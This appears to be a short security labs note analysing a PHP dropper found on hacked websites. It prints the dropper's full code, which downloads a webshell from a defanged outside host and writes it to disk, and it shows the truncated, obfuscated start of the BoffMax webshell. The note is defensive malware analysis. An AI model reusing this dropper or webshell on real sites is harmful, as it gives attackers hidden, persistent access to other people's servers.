Web shell downloader – simple attempt to avoid detection

Labs Note

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.

One of the techniques they use to increase those odds, is injecting a file known as Dropper that downloads the real malware into the system. The Dropper could go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system as you can see in the snippet below:

<?php
if( $z = fopen( 'include4.php', 'w') ) {
 if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
 fclose( $z );
 echo '0';
 } else {
 echo '1';
 }
} else {
 echo '2';
}

If you are unfamiliar with PHP, don’t you worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed as a result of the request. – the well known exit code in UNIX systems for successful execution of command. If the operation can’t download the webshell, it prints 1; if it can’t create the file in which the shell will resides  it prints 2.

The following code is the content of the webshell fetched from the ‘hxxttp://picasa(dot)commie.msgftw(dot)com/priv8.php’ link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net

You May Also Like